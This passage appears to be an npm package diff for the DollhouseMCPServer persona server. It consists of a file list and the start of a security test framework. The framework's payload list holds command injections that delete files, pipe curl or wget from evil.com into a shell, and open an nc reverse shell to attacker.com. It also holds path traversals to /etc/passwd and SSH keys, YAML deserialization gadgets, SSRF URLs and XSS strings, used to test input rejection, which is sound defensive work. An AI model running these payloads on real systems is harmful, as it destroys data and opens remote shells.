- package/dist/test/src/config/indicator-config.d.ts.map +1 -0
- package/dist/test/src/config/indicator-config.js +158 -0
- package/dist/test/src/constants/defaultPersonas.d.ts +10 -0
- package/dist/test/src/constants/defaultPersonas.d.ts.map +1 -0
- package/dist/test/src/constants/defaultPersonas.js +18 -0
- package/dist/test/src/constants/limits.d.ts +10 -0
- package/dist/test/src/constants/limits.d.ts.map +1 -0
- package/dist/test/src/constants/limits.js +13 -0
- package/dist/test/src/elements/BaseElement.d.ts +81 -0
- package/dist/test/src/elements/BaseElement.d.ts.map +1 -0
- package/dist/test/src/elements/BaseElement.js +381 -0
- package/dist/test/src/elements/FeedbackProcessor.d.ts +57 -0
- package/dist/test/src/elements/FeedbackProcessor.d.ts.map +1 -0
- package/dist/test/src/elements/FeedbackProcessor.js +418 -0
- package/dist/test/src/elements/agents/Agent.d.ts +145 -0
- package/dist/test/src/elements/agents/Agent.d.ts.map +1 -0
- package/dist/test/src/elements/agents/Agent.js +848 -0
- package/dist/test/src/elements/agents/AgentManager.d.ts +125 -0
- package/dist/test/src/elements/agents/AgentManager.d.ts.map +1 -0
- package/dist/test/src/elements/agents/AgentManager.js +608 -0
- package/dist/test/src/elements/agents/constants.d.ts +42 -0
- package/dist/test/src/elements/agents/constants.d.ts.map +1 -0
- package/dist/test/src/elements/agents/constants.js +45 -0
- package/dist/test/src/elements/agents/goalTemplates.d.ts +44 -0
- package/dist/test/src/elements/agents/goalTemplates.d.ts.map +1 -0
- package/dist/test/src/elements/agents/goalTemplates.js +297 -0
- package/dist/test/src/elements/agents/index.d.ts +8 -0
- package/dist/test/src/elements/agents/index.d.ts.map +1 -0
- package/dist/test/src/elements/agents/index.js +8 -0
- package/dist/test/src/elements/agents/ruleEngineConfig.d.ts +76 -0
- package/dist/test/src/elements/agents/ruleEngineConfig.d.ts.map +1 -0
- package/dist/test/src/elements/agents/ruleEngineConfig.js +143 -0
- package/dist/test/src/elements/agents/types.d.ts +97 -0
- package/dist/test/src/elements/agents/types.d.ts.map +1 -0
- package/dist/test/src/elements/agents/types.js +5 -0
- package/dist/test/src/elements/index.d.ts +6 -0
- package/dist/test/src/elements/index.d.ts.map +1 -0
- package/dist/test/src/elements/index.js +6 -0
- package/dist/test/src/elements/memories/Memory.d.ts +110 -0
- package/dist/test/src/elements/memories/Memory.d.ts.map +1 -0
- package/dist/test/src/elements/memories/Memory.js +470 -0
- package/dist/test/src/elements/memories/MemoryManager.d.ts +86 -0
- package/dist/test/src/elements/memories/MemoryManager.d.ts.map +1 -0
- package/dist/test/src/elements/memories/MemoryManager.js +435 -0
- package/dist/test/src/elements/memories/constants.d.ts +42 -0
- package/dist/test/src/elements/memories/constants.d.ts.map +1 -0
- package/dist/test/src/elements/memories/constants.js +49 -0
- package/dist/test/src/elements/memories/index.d.ts +6 -0
- package/dist/test/src/elements/memories/index.d.ts.map +1 -0
- package/dist/test/src/elements/memories/index.js +6 -0
- package/dist/test/src/elements/skills/Skill.d.ts +109 -0
- package/dist/test/src/elements/skills/Skill.d.ts.map +1 -0
- package/dist/test/src/elements/skills/Skill.js +381 -0
- package/dist/test/src/elements/templates/Template.d.ts +138 -0
- package/dist/test/src/elements/templates/Template.d.ts.map +1 -0
- package/dist/test/src/elements/templates/Template.js +673 -0
- package/dist/test/src/elements/templates/TemplateManager.d.ts +104 -0
- package/dist/test/src/elements/templates/TemplateManager.d.ts.map +1 -0
- package/dist/test/src/elements/templates/TemplateManager.js +496 -0
- package/dist/test/src/elements/templates/index.d.ts +6 -0
- package/dist/test/src/elements/templates/index.d.ts.map +1 -0
- package/dist/test/src/elements/templates/index.js +6 -0
- package/dist/test/src/errors/SecurityError.d.ts +29 -0
- package/dist/test/src/errors/SecurityError.d.ts.map +1 -0
- package/dist/test/src/errors/SecurityError.js +47 -0
- package/dist/test/src/errors/index.d.ts +2 -0
- package/dist/test/src/errors/index.d.ts.map +1 -0
- package/dist/test/src/errors/index.js +2 -0
- package/dist/test/src/index.barrel.d.ts +21 -0
- package/dist/test/src/index.barrel.d.ts.map +1 -0
- package/dist/test/src/index.barrel.js +31 -0
- package/dist/test/src/index.d.ts +223 -0
- package/dist/test/src/index.d.ts.map +1 -0
- package/dist/test/src/index.js +1594 -0
- package/dist/test/src/marketplace/GitHubClient.d.ts +22 -0
- package/dist/test/src/marketplace/GitHubClient.d.ts.map +1 -0
- package/dist/test/src/marketplace/GitHubClient.js +112 -0
- package/dist/test/src/marketplace/MarketplaceBrowser.d.ts +21 -0
- package/dist/test/src/marketplace/MarketplaceBrowser.d.ts.map +1 -0
- package/dist/test/src/marketplace/MarketplaceBrowser.js +45 -0
- package/dist/test/src/marketplace/MarketplaceSearch.d.ts +18 -0
- package/dist/test/src/marketplace/MarketplaceSearch.d.ts.map +1 -0
- package/dist/test/src/marketplace/MarketplaceSearch.js +36 -0
- package/dist/test/src/marketplace/PersonaDetails.d.ts +22 -0
- package/dist/test/src/marketplace/PersonaDetails.d.ts.map +1 -0
- package/dist/test/src/marketplace/PersonaDetails.js +71 -0
- package/dist/test/src/marketplace/PersonaInstaller.d.ts +25 -0
- package/dist/test/src/marketplace/PersonaInstaller.d.ts.map +1 -0
- package/dist/test/src/marketplace/PersonaInstaller.js +100 -0
- package/dist/test/src/marketplace/PersonaSubmitter.d.ts +19 -0
- package/dist/test/src/marketplace/PersonaSubmitter.d.ts.map +1 -0
- package/dist/test/src/marketplace/PersonaSubmitter.js +57 -0
- package/dist/test/src/marketplace/index.d.ts +10 -0
- package/dist/test/src/marketplace/index.d.ts.map +1 -0
- package/dist/test/src/marketplace/index.js +10 -0
- package/dist/test/src/persona/PersonaElement.d.ts +64 -0
- package/dist/test/src/persona/PersonaElement.d.ts.map +1 -0
- package/dist/test/src/persona/PersonaElement.js +223 -0
- package/dist/test/src/persona/PersonaElementManager.d.ts +97 -0
- package/dist/test/src/persona/PersonaElementManager.d.ts.map +1 -0
- package/dist/test/src/persona/PersonaElementManager.js +342 -0
- package/dist/test/src/persona/PersonaLoader.d.ts +34 -0
- package/dist/test/src/persona/PersonaLoader.d.ts.map +1 -0
- package/dist/test/src/persona/PersonaLoader.js +145 -0
- package/dist/test/src/persona/PersonaManager.d.ts +112 -0
- package/dist/test/src/persona/PersonaManager.d.ts.map +1 -0
- package/dist/test/src/persona/PersonaManager.js +341 -0
- package/dist/test/src/persona/PersonaValidator.d.ts +33 -0
- package/dist/test/src/persona/PersonaValidator.d.ts.map +1 -0
- package/dist/test/src/persona/PersonaValidator.js +157 -0
- package/dist/test/src/persona/export-import/PersonaExporter.d.ts +43 -0
- package/dist/test/src/persona/export-import/PersonaExporter.d.ts.map +1 -0
- package/dist/test/src/persona/export-import/PersonaExporter.js +99 -0
- package/dist/test/src/persona/export-import/PersonaImporter.d.ts +65 -0
- package/dist/test/src/persona/export-import/PersonaImporter.d.ts.map +1 -0
- package/dist/test/src/persona/export-import/PersonaImporter.js +315 -0
- package/dist/test/src/persona/export-import/PersonaSharer.d.ts +60 -0
- package/dist/test/src/persona/export-import/PersonaSharer.d.ts.map +1 -0
- package/dist/test/src/persona/export-import/PersonaSharer.js +502 -0
- package/dist/test/src/persona/export-import/index.d.ts +10 -0
- package/dist/test/src/persona/export-import/index.d.ts.map +1 -0
- package/dist/test/src/persona/export-import/index.js +7 -0
- package/dist/test/src/persona/index.d.ts +7 -0
- package/dist/test/src/persona/index.d.ts.map +1 -0
- package/dist/test/src/persona/index.js +7 -0
- package/dist/test/src/portfolio/MigrationManager.d.ts +44 -0
- package/dist/test/src/portfolio/MigrationManager.d.ts.map +1 -0
- package/dist/test/src/portfolio/MigrationManager.js +163 -0
- package/dist/test/src/portfolio/PortfolioManager.d.ts +54 -0
- package/dist/test/src/portfolio/PortfolioManager.d.ts.map +1 -0
- package/dist/test/src/portfolio/PortfolioManager.js +224 -0
- package/dist/test/src/portfolio/types.d.ts +18 -0
- package/dist/test/src/portfolio/types.d.ts.map +1 -0
- package/dist/test/src/portfolio/types.js +13 -0
- package/dist/test/src/security/InputValidator.d.ts +80 -0
- package/dist/test/src/security/InputValidator.d.ts.map +1 -0
- package/dist/test/src/security/InputValidator.js +436 -0
- package/dist/test/src/security/audit/SecurityAuditor.d.ts +44 -0
- package/dist/test/src/security/audit/SecurityAuditor.d.ts.map +1 -0
- package/dist/test/src/security/audit/SecurityAuditor.js +274 -0
- package/dist/test/src/security/audit/config/suppressions.d.ts +34 -0
- package/dist/test/src/security/audit/config/suppressions.d.ts.map +1 -0
- package/dist/test/src/security/audit/config/suppressions.js +575 -0
- package/dist/test/src/security/audit/index.d.ts +14 -0
- package/dist/test/src/security/audit/index.d.ts.map +1 -0
- package/dist/test/src/security/audit/index.js +15 -0
- package/dist/test/src/security/audit/reporters/ConsoleReporter.d.ts +46 -0
- package/dist/test/src/security/audit/reporters/ConsoleReporter.d.ts.map +1 -0
- package/dist/test/src/security/audit/reporters/ConsoleReporter.js +174 -0
- package/dist/test/src/security/audit/reporters/JsonReporter.d.ts +13 -0
- package/dist/test/src/security/audit/reporters/JsonReporter.d.ts.map +1 -0
- package/dist/test/src/security/audit/reporters/JsonReporter.js +25 -0
- package/dist/test/src/security/audit/reporters/MarkdownReporter.d.ts +13 -0
- package/dist/test/src/security/audit/reporters/MarkdownReporter.d.ts.map +1 -0
- package/dist/test/src/security/audit/reporters/MarkdownReporter.js +79 -0
- package/dist/test/src/security/audit/rules/SecurityRules.d.ts +20 -0
- package/dist/test/src/security/audit/rules/SecurityRules.d.ts.map +1 -0
- package/dist/test/src/security/audit/rules/SecurityRules.js +244 -0
- package/dist/test/src/security/audit/scanners/CodeScanner.d.ts +47 -0
- package/dist/test/src/security/audit/scanners/CodeScanner.d.ts.map +1 -0
- package/dist/test/src/security/audit/scanners/CodeScanner.js +174 -0
- package/dist/test/src/security/audit/scanners/ConfigurationScanner.d.ts +13 -0
- package/dist/test/src/security/audit/scanners/ConfigurationScanner.d.ts.map +1 -0
- package/dist/test/src/security/audit/scanners/ConfigurationScanner.js +22 -0
- package/dist/test/src/security/audit/scanners/DependencyScanner.d.ts +13 -0
- package/dist/test/src/security/audit/scanners/DependencyScanner.d.ts.map +1 -0
- package/dist/test/src/security/audit/scanners/DependencyScanner.js +22 -0
- package/dist/test/src/security/audit/types.d.ts +94 -0
- package/dist/test/src/security/audit/types.d.ts.map +1 -0
- package/dist/test/src/security/audit/types.js +6 -0
- package/dist/test/src/security/commandValidator.d.ts +7 -0
- package/dist/test/src/security/commandValidator.d.ts.map +1 -0
- package/dist/test/src/security/commandValidator.js +78 -0
- package/dist/test/src/security/constants.d.ts +24 -0
- package/dist/test/src/security/constants.d.ts.map +1 -0
- package/dist/test/src/security/constants.js +26 -0
- package/dist/test/src/security/contentValidator.d.ts +47 -0
- package/dist/test/src/security/contentValidator.d.ts.map +1 -0
- package/dist/test/src/security/contentValidator.js +301 -0
- package/dist/test/src/security/errors.d.ts +14 -0
- package/dist/test/src/security/errors.d.ts.map +1 -0
- package/dist/test/src/security/errors.js +28 -0
- package/dist/test/src/security/fileLockManager.d.ts +70 -0
- package/dist/test/src/security/fileLockManager.d.ts.map +1 -0
- package/dist/test/src/security/fileLockManager.js +187 -0
- package/dist/test/src/security/index.d.ts +12 -0
- package/dist/test/src/security/index.d.ts.map +1 -0
- package/dist/test/src/security/index.js +14 -0
- package/dist/test/src/security/pathValidator.d.ts +9 -0
- package/dist/test/src/security/pathValidator.d.ts.map +1 -0
- package/dist/test/src/security/pathValidator.js +98 -0
- package/dist/test/src/security/regexValidator.d.ts +59 -0
- package/dist/test/src/security/regexValidator.d.ts.map +1 -0
- package/dist/test/src/security/regexValidator.js +214 -0
- package/dist/test/src/security/secureYamlParser.d.ts +46 -0
- package/dist/test/src/security/secureYamlParser.d.ts.map +1 -0
- package/dist/test/src/security/secureYamlParser.js +203 -0
- package/dist/test/src/security/securityMonitor.d.ts +58 -0
- package/dist/test/src/security/securityMonitor.d.ts.map +1 -0
- package/dist/test/src/security/securityMonitor.js +108 -0
- package/dist/test/src/security/tokenManager.d.ts +85 -0
- package/dist/test/src/security/tokenManager.d.ts.map +1 -0
- package/dist/test/src/security/tokenManager.js +286 -0
- package/dist/test/src/security/validators/unicodeValidator.d.ts +97 -0
- package/dist/test/src/security/validators/unicodeValidator.d.ts.map +1 -0
- package/dist/test/src/security/validators/unicodeValidator.js +312 -0
- package/dist/test/src/security/yamlValidator.d.ts +21 -0
- package/dist/test/src/security/yamlValidator.d.ts.map +1 -0
- package/dist/test/src/security/yamlValidator.js +164 -0
- package/dist/test/src/server/ServerSetup.d.ts +35 -0
- package/dist/test/src/server/ServerSetup.d.ts.map +1 -0
- package/dist/test/src/server/ServerSetup.js +116 -0
- package/dist/test/src/server/index.d.ts +7 -0
- package/dist/test/src/server/index.d.ts.map +1 -0
- package/dist/test/src/server/index.js +7 -0
- package/dist/test/src/server/startup.d.ts +31 -0
- package/dist/test/src/server/startup.d.ts.map +1 -0
- package/dist/test/src/server/startup.js +67 -0
- package/dist/test/src/server/tools/CollectionTools.d.ts +10 -0
- package/dist/test/src/server/tools/CollectionTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/CollectionTools.js +96 -0
- package/dist/test/src/server/tools/ConfigTools.d.ts +10 -0
- package/dist/test/src/server/tools/ConfigTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/ConfigTools.js +63 -0
- package/dist/test/src/server/tools/MarketplaceTools.d.ts +10 -0
- package/dist/test/src/server/tools/MarketplaceTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/MarketplaceTools.js +92 -0
- package/dist/test/src/server/tools/PersonaTools.d.ts +10 -0
- package/dist/test/src/server/tools/PersonaTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/PersonaTools.js +257 -0
- package/dist/test/src/server/tools/ToolRegistry.d.ts +37 -0
- package/dist/test/src/server/tools/ToolRegistry.d.ts.map +1 -0
- package/dist/test/src/server/tools/ToolRegistry.js +40 -0
- package/dist/test/src/server/tools/UpdateTools.d.ts +10 -0
- package/dist/test/src/server/tools/UpdateTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/UpdateTools.js +64 -0
- package/dist/test/src/server/tools/UserTools.d.ts +10 -0
- package/dist/test/src/server/tools/UserTools.d.ts.map +1 -0
- package/dist/test/src/server/tools/UserTools.js +51 -0
- package/dist/test/src/server/tools/index.d.ts +10 -0
- package/dist/test/src/server/tools/index.d.ts.map +1 -0
- package/dist/test/src/server/tools/index.js +10 -0
- package/dist/test/src/server/types.d.ts +34 -0
- package/dist/test/src/server/types.d.ts.map +1 -0
- package/dist/test/src/server/types.js +5 -0
- package/dist/test/src/tools/debug.d.ts +20 -0
- package/dist/test/src/tools/debug.d.ts.map +1 -0
- package/dist/test/src/tools/debug.js +37 -0
- package/dist/test/src/types/cache.d.ts +8 -0
- package/dist/test/src/types/cache.d.ts.map +1 -0
- package/dist/test/src/types/cache.js +5 -0
- package/dist/test/src/types/collection.d.ts +23 -0
- package/dist/test/src/types/collection.d.ts.map +1 -0
- package/dist/test/src/types/collection.js +5 -0
- package/dist/test/src/types/elements/IElement.d.ts +123 -0
- package/dist/test/src/types/elements/IElement.d.ts.map +1 -0
- package/dist/test/src/types/elements/IElement.js +30 -0
- package/dist/test/src/types/elements/IElementManager.d.ts +65 -0
- package/dist/test/src/types/elements/IElementManager.d.ts.map +1 -0
- package/dist/test/src/types/elements/IElementManager.js +6 -0
- package/dist/test/src/types/elements/IRatingManager.d.ts +109 -0
- package/dist/test/src/types/elements/IRatingManager.d.ts.map +1 -0
- package/dist/test/src/types/elements/IRatingManager.js +6 -0
- package/dist/test/src/types/elements/IReferenceResolver.d.ts +52 -0
- package/dist/test/src/types/elements/IReferenceResolver.d.ts.map +1 -0
- package/dist/test/src/types/elements/IReferenceResolver.js +6 -0
- package/dist/test/src/types/elements/RatingBreakdowns.d.ts +49 -0
- package/dist/test/src/types/elements/RatingBreakdowns.d.ts.map +1 -0
- package/dist/test/src/types/elements/RatingBreakdowns.js +6 -0
- package/dist/test/src/types/elements/index.d.ts +9 -0
- package/dist/test/src/types/elements/index.d.ts.map +1 -0
- package/dist/test/src/types/elements/index.js +11 -0
- package/dist/test/src/types/index.d.ts +9 -0
- package/dist/test/src/types/index.d.ts.map +1 -0
- package/dist/test/src/types/index.js +9 -0
- package/dist/test/src/types/marketplace.d.ts +23 -0
- package/dist/test/src/types/marketplace.d.ts.map +1 -0
- package/dist/test/src/types/marketplace.js +5 -0
- package/dist/test/src/types/mcp.d.ts +84 -0
- package/dist/test/src/types/mcp.d.ts.map +1 -0
- package/dist/test/src/types/mcp.js +80 -0
- package/dist/test/src/types/persona.d.ts +30 -0
- package/dist/test/src/types/persona.d.ts.map +1 -0
- package/dist/test/src/types/persona.js +5 -0
- package/dist/test/src/update/BackupManager.d.ts +46 -0
- package/dist/test/src/update/BackupManager.d.ts.map +1 -0
- package/dist/test/src/update/BackupManager.js +261 -0
- package/dist/test/src/update/DependencyChecker.d.ts +41 -0
- package/dist/test/src/update/DependencyChecker.d.ts.map +1 -0
- package/dist/test/src/update/DependencyChecker.js +132 -0
- package/dist/test/src/update/RateLimiter.d.ts +80 -0
- package/dist/test/src/update/RateLimiter.d.ts.map +1 -0
- package/dist/test/src/update/RateLimiter.js +172 -0
- package/dist/test/src/update/SignatureVerifier.d.ts +71 -0
- package/dist/test/src/update/SignatureVerifier.d.ts.map +1 -0
- package/dist/test/src/update/SignatureVerifier.js +214 -0
- package/dist/test/src/update/UpdateChecker.d.ts +127 -0
- package/dist/test/src/update/UpdateChecker.d.ts.map +1 -0
- package/dist/test/src/update/UpdateChecker.js +469 -0
- package/dist/test/src/update/UpdateManager.d.ts +41 -0
- package/dist/test/src/update/UpdateManager.d.ts.map +1 -0
- package/dist/test/src/update/UpdateManager.js +260 -0
- package/dist/test/src/update/VersionManager.d.ts +31 -0
- package/dist/test/src/update/VersionManager.d.ts.map +1 -0
- package/dist/test/src/update/VersionManager.js +134 -0
- package/dist/test/src/update/index.d.ts +9 -0
- package/dist/test/src/update/index.d.ts.map +1 -0
- package/dist/test/src/update/index.js +9 -0
- package/dist/test/src/utils/filesystem.d.ts +29 -0
- package/dist/test/src/utils/filesystem.d.ts.map +1 -0
- package/dist/test/src/utils/filesystem.js +94 -0
- package/dist/test/src/utils/git.d.ts +32 -0
- package/dist/test/src/utils/git.d.ts.map +1 -0
- package/dist/test/src/utils/git.js +65 -0
- package/dist/test/src/utils/index.d.ts +7 -0
- package/dist/test/src/utils/index.d.ts.map +1 -0
- package/dist/test/src/utils/index.js +7 -0
- package/dist/test/src/utils/logger.d.ts +45 -0
- package/dist/test/src/utils/logger.d.ts.map +1 -0
- package/dist/test/src/utils/logger.js +91 -0
- package/dist/test/src/utils/version.d.ts +25 -0
- package/dist/test/src/utils/version.d.ts.map +1 -0
- package/dist/test/src/utils/version.js +97 -0
- package/dist/test/test/__tests__/integration/helpers/file-utils.d.ts +33 -0
- package/dist/test/test/__tests__/integration/helpers/file-utils.d.ts.map +1 -0
- package/dist/test/test/__tests__/integration/helpers/file-utils.js +83 -0
- package/dist/test/test/__tests__/integration/helpers/test-fixtures.d.ts +26 -0
- package/dist/test/test/__tests__/integration/helpers/test-fixtures.d.ts.map +1 -0
- package/dist/test/test/__tests__/integration/helpers/test-fixtures.js +95 -0
- package/dist/test/test/__tests__/integration/helpers/test-server.d.ts +26 -0
- package/dist/test/test/__tests__/integration/helpers/test-server.d.ts.map +1 -0
- package/dist/test/test/__tests__/integration/helpers/test-server.js +41 -0
- package/dist/test/test/__tests__/integration/setup.d.ts +8 -0
- package/dist/test/test/__tests__/integration/setup.d.ts.map +1 -0
- package/dist/test/test/__tests__/integration/setup.js +31 -0
- package/dist/test/test/__tests__/integration/teardown.d.ts +5 -0
- package/dist/test/test/__tests__/integration/teardown.d.ts.map +1 -0
- package/dist/test/test/__tests__/integration/teardown.js +23 -0
- package/dist/test/test/__tests__/security/framework/RapidSecurityTesting.d.ts +34 -0
- package/dist/test/test/__tests__/security/framework/RapidSecurityTesting.d.ts.map +1 -0
- package/dist/test/test/__tests__/security/framework/RapidSecurityTesting.js +224 -0
- package/dist/test/test/__tests__/security/framework/SecurityTestFramework.d.ts +89 -0
- package/dist/test/test/__tests__/security/framework/SecurityTestFramework.d.ts.map +1 -0
- package/dist/test/test/__tests__/security/framework/SecurityTestFramework.js +543 -0
- package/dist/test/test/__tests__/security/index.d.ts +46 -0
- package/dist/test/test/__tests__/security/index.d.ts.map +1 -0
- package/dist/test/test/__tests__/security/index.js +98 -0
- package/dist/test/test/__tests__/security/setup.d.ts +3 -0
- package/dist/test/test/__tests__/security/setup.d.ts.map +1 -0
- package/dist/test/test/__tests__/security/setup.js +23 -0
- package/dist/tools/debug.d.ts +20 -0
- package/dist/tools/debug.d.ts.map +1 -0
- package/dist/tools/debug.js +37 -0
- package/dist/types/cache.d.ts +8 -0
- package/dist/types/cache.d.ts.map +1 -0
- package/dist/types/cache.js +5 -0
- package/dist/types/collection.d.ts +23 -0
- package/dist/types/collection.d.ts.map +1 -0
- package/dist/types/collection.js +5 -0
- package/dist/types/elements/IElement.d.ts +123 -0
- package/dist/types/elements/IElement.d.ts.map +1 -0
- package/dist/types/elements/IElement.js +30 -0
- package/dist/types/elements/IElementManager.d.ts +65 -0
- package/dist/types/elements/IElementManager.d.ts.map +1 -0
- package/dist/types/elements/IElementManager.js +6 -0
- package/dist/types/elements/IRatingManager.d.ts +109 -0
- package/dist/types/elements/IRatingManager.d.ts.map +1 -0
- package/dist/types/elements/IRatingManager.js +6 -0
- package/dist/types/elements/IReferenceResolver.d.ts +52 -0
- package/dist/types/elements/IReferenceResolver.d.ts.map +1 -0
- package/dist/types/elements/IReferenceResolver.js +6 -0
- package/dist/types/elements/RatingBreakdowns.d.ts +49 -0
- package/dist/types/elements/RatingBreakdowns.d.ts.map +1 -0
- package/dist/types/elements/RatingBreakdowns.js +6 -0
- package/dist/types/elements/index.d.ts +9 -0
- package/dist/types/elements/index.d.ts.map +1 -0
- package/dist/types/elements/index.js +11 -0
- package/dist/types/index.d.ts +9 -0
- package/dist/types/index.d.ts.map +1 -0
- package/dist/types/index.js +9 -0
- package/dist/types/marketplace.d.ts +23 -0
- package/dist/types/marketplace.d.ts.map +1 -0
- package/dist/types/marketplace.js +5 -0
- package/dist/types/mcp.d.ts +84 -0
- package/dist/types/mcp.d.ts.map +1 -0
- package/dist/types/mcp.js +80 -0
- package/dist/types/persona.d.ts +30 -0
- package/dist/types/persona.d.ts.map +1 -0
- package/dist/types/persona.js +5 -0
- package/dist/update/BackupManager.d.ts +46 -0
- package/dist/update/BackupManager.d.ts.map +1 -0
- package/dist/update/BackupManager.js +261 -0
- package/dist/update/DependencyChecker.d.ts +41 -0
- package/dist/update/DependencyChecker.d.ts.map +1 -0
- package/dist/update/DependencyChecker.js +132 -0
- package/dist/update/RateLimiter.d.ts +80 -0
- package/dist/update/RateLimiter.d.ts.map +1 -0
- package/dist/update/RateLimiter.js +172 -0
- package/dist/update/SignatureVerifier.d.ts +71 -0
- package/dist/update/SignatureVerifier.d.ts.map +1 -0
- package/dist/update/SignatureVerifier.js +214 -0
- package/dist/update/UpdateChecker.d.ts +127 -0
- package/dist/update/UpdateChecker.d.ts.map +1 -0
- package/dist/update/UpdateChecker.js +469 -0
- package/dist/update/UpdateManager.d.ts +41 -0
- package/dist/update/UpdateManager.d.ts.map +1 -0
- package/dist/update/UpdateManager.js +260 -0
- package/dist/update/VersionManager.d.ts +31 -0
- package/dist/update/VersionManager.d.ts.map +1 -0
- package/dist/update/VersionManager.js +134 -0
- package/dist/update/index.d.ts +9 -0
- package/dist/update/index.d.ts.map +1 -0
- package/dist/update/index.js +9 -0
- package/dist/utils/filesystem.d.ts +29 -0
- package/dist/utils/filesystem.d.ts.map +1 -0
- package/dist/utils/filesystem.js +94 -0
- package/dist/utils/git.d.ts +32 -0
- package/dist/utils/git.d.ts.map +1 -0
- package/dist/utils/git.js +65 -0
- package/dist/utils/index.d.ts +7 -0
- package/dist/utils/index.d.ts.map +1 -0
- package/dist/utils/index.js +7 -0
- package/dist/utils/logger.d.ts +45 -0
- package/dist/utils/logger.d.ts.map +1 -0
- package/dist/utils/logger.js +91 -0
- package/dist/utils/version.d.ts +25 -0
- package/dist/utils/version.d.ts.map +1 -0
- package/dist/utils/version.js +97 -0
- package/package.json +128 -0
|
@@ -0,0 +1,543 @@
|
|
|
1
|
+
import * as fs from 'fs/promises';
|
|
2
|
+
import * as path from 'path';
|
|
3
|
+
import { DollhouseMCPServer } from '../../../../src/index.js';
|
|
4
|
+
export class SecurityTestFramework {
|
|
5
|
+
static MALICIOUS_PAYLOADS = {
|
|
6
|
+
commandInjection: [
|
|
7
|
+
'; rm -rf /',
|
|
8
|
+
'&& curl evil.com | sh',
|
|
9
|
+
'| nc -e /bin/sh attacker.com 4444',
|
|
10
|
+
'`touch /tmp/pwned`',
|
|
11
|
+
'$(wget http://evil.com/shell.sh -O - | sh)',
|
|
12
|
+
'\n/bin/sh',
|
|
13
|
+
'; echo "pwned" > /etc/passwd',
|
|
14
|
+
'|| python -c "import os; os.system(\'rm -rf /\')"'
|
|
15
|
+
],
|
|
16
|
+
pathTraversal: [
|
|
17
|
+
'../../../etc/passwd',
|
|
18
|
+
'..\\..\\..\\windows\\system32\\config\\sam',
|
|
19
|
+
'personas/../../../sensitive.txt',
|
|
20
|
+
'./././../../../root/.ssh/id_rsa',
|
|
21
|
+
'%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
|
|
22
|
+
'....//....//....//etc/passwd',
|
|
23
|
+
'personas/../../custom-personas/../../backups/../../../etc/hosts'
|
|
24
|
+
],
|
|
25
|
+
yamlInjection: [
|
|
26
|
+
'!!js/function "function(){require(\'child_process\').exec(\'calc.exe\')}"',
|
|
27
|
+
'!!python/object/apply:os.system ["rm -rf /"]',
|
|
28
|
+
'!!python/object/new:subprocess.Popen [["curl", "evil.com/shell.sh", "|", "sh"]]',
|
|
29
|
+
'&anchor [*anchor, *anchor, *anchor, *anchor, *anchor]'
|
|
30
|
+
],
|
|
31
|
+
ssrf: [
|
|
32
|
+
'http://localhost:8080/admin',
|
|
33
|
+
'http://127.0.0.1:22',
|
|
34
|
+
'http://169.254.169.254/latest/meta-data/',
|
|
35
|
+
'http://192.168.1.1/config',
|
|
36
|
+
'http://[::1]:8080',
|
|
37
|
+
'file:///etc/passwd',
|
|
38
|
+
'gopher://localhost:8080/_GET / HTTP/1.1'
|
|
39
|
+
],
|
|
40
|
+
xss: [
|
|
41
|
+
'<script>alert("XSS")</script>',
|
|
42
|
+
'<img src=x onerror=alert("XSS")>',
|
|
43
|
+
'javascript:alert("XSS")',
|
|
44
|
+
'<svg onload=alert("XSS")>',
|
|
45
|
+
'"><script>alert(String.fromCharCode(88,83,83))</script>'
|
|
46
|
+
]
|
|
47
|
+
};
|
|
48
|
+
/**
|
|
49
|
+
* Test that a function properly rejects malicious payloads
|
|
50
|
+
*/
|
|
51
|
+
static async testPayloadRejection(fn, payloadType, argPosition = 0) {
|
|
52
|
+
const payloads = this.MALICIOUS_PAYLOADS[payloadType];
|
|
53
|
+
for (const payload of payloads) {
|
|
54
|
+
const args = Array(argPosition + 1).fill('safe-value');
|
|
55
|
+
args[argPosition] = payload;
|
|
56
|
+
await expect(async () => {
|
|
57
|
+
await fn(...args);
|
|
58
|
+
}).rejects.toThrow();
|
|
59
|
+
}
|
|
60
|
+
}
|
|
61
|
+
/**
|
|
62
|
+
* Test that file operations are properly sandboxed
|
|
63
|
+
*/
|
|
64
|
+
static async testFileSandbox(fileOperation, allowedPaths) {
|
|
65
|
+
// Test allowed paths work
|
|
66
|
+
for (const allowed of allowedPaths) {
|
|
67
|
+
const testPath = path.join(allowed, 'test.md');
|
|
68
|
+
// Should not throw for allowed paths
|
|
69
|
+
await expect(fileOperation(testPath)).resolves.toBeDefined();
|
|
70
|
+
}
|
|
71
|
+
// Test path traversal attempts are blocked
|
|
72
|
+
const traversalAttempts = [
|
|
73
|
+
'../../../etc/passwd',
|
|
74
|
+
path.join(allowedPaths[0], '..', '..', '..', 'etc', 'passwd'),
|
|
75
|
+
'/etc/passwd',
|
|
76
|
+
'C:\\Windows\\System32\\config\\SAM'
|
|
77
|
+
];
|
|
78
|
+
for (const attempt of traversalAttempts) {
|
|
79
|
+
await expect(fileOperation(attempt)).rejects.toThrow();
|
|
80
|
+
}
|
|
81
|
+
}
|
|
82
|
+
/**
|
|
83
|
+
* Test rate limiting functionality
|
|
84
|
+
*/
|
|
85
|
+
static async testRateLimit(operation, limit, windowMs) {
|
|
86
|
+
const start = Date.now();
|
|
87
|
+
const attempts = [];
|
|
88
|
+
// Make limit + 1 attempts
|
|
89
|
+
for (let i = 0; i <= limit; i++) {
|
|
90
|
+
attempts.push(operation());
|
|
91
|
+
}
|
|
92
|
+
const results = await Promise.allSettled(attempts);
|
|
93
|
+
// First 'limit' attempts should succeed
|
|
94
|
+
for (let i = 0; i < limit; i++) {
|
|
95
|
+
expect(results[i].status).toBe('fulfilled');
|
|
96
|
+
}
|
|
97
|
+
// Last attempt should be rate limited
|
|
98
|
+
expect(results[limit].status).toBe('rejected');
|
|
99
|
+
if (results[limit].status === 'rejected') {
|
|
100
|
+
expect(results[limit].reason.message).toContain('rate limit');
|
|
101
|
+
}
|
|
102
|
+
}
|
|
103
|
+
/**
|
|
104
|
+
* Test input sanitization
|
|
105
|
+
*/
|
|
106
|
+
static testSanitization(sanitizer, expectations) {
|
|
107
|
+
for (const { input, expected } of expectations) {
|
|
108
|
+
const result = sanitizer(input);
|
|
109
|
+
expect(result).toBe(expected);
|
|
110
|
+
}
|
|
111
|
+
}
|
|
112
|
+
/**
|
|
